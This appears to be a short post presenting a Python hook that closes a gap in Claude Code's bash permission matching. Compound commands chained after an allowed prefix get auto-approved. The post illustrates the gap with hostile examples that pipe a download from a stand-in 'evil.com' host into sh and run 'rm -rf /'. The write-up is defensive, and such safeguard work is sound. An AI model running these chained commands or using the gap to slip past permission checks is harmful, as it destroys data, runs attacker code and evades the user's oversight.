Smart Bash Permission Hook for Claude Code Prevents Compound Command Bypass

Security Gap in Claude Code's Permission System

Claude Code's permission system has a vulnerability where compound bash commands can bypass allow/deny patterns. When you allow a command like Bash(git status:*), Claude Code matches the entire command string against that pattern. This means a compound command like git status && curl -s http://evil.com | sh would match git status* and get auto-approved, even though it chains in curl and sh commands.

The Solution: claude-hooks

The fix is a single Python script called claude-hooks that runs as a PreToolUse hook. It performs several key functions:

• Decomposes compound commands by splitting on &&, ||, ;, |, newlines, and extracts $() and backtick subshell contents recursively
• Normalizes each sub-command by stripping env var prefixes, I/O redirections, heredoc bodies, and shell keywords
• Checks each sub-command individually against your existing permissions.allow and permissions.deny patterns
• Deny wins — if any sub-command matches a deny pattern, the whole command is denied
• All must allow — auto-approve only happens when every sub-command matches an allow pattern
• Falls through gracefully — if any sub-command is unknown, you still get the normal permission prompt

Setup Instructions

Installation takes about 30 seconds:

curl -fsSL -o ~/.claude/hooks/smart_approve.py \
https://raw.githubusercontent.com/liberzon/claude-hooks/main/smart_approve.py

Add to ~/.claude/settings.json:

{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Bash",
        "hooks": [
          {
            "type": "command",
            "command": "python3 ~/.claude/hooks/smart_approve.py"
          }
        ]
      }
    ]
  }
}

The tool has no dependencies beyond Python 3 and requires zero configuration — it reads your existing permission patterns.

Example Behavior

• git status: Allowed both with and without hook
• git add . && git commit -m "msg": Allowed both with and without hook (both match git *)
• git status && rm -rf /: Allowed without hook, prompt shown with hook (rm -rf / has no allow)
• `npm test | tee output.log`: Allowed
• FOO=bar git push: Might not match without hook, allowed with hook (env var stripped)

The repository is available at https://github.com/liberzon/claude-hooks under MIT license.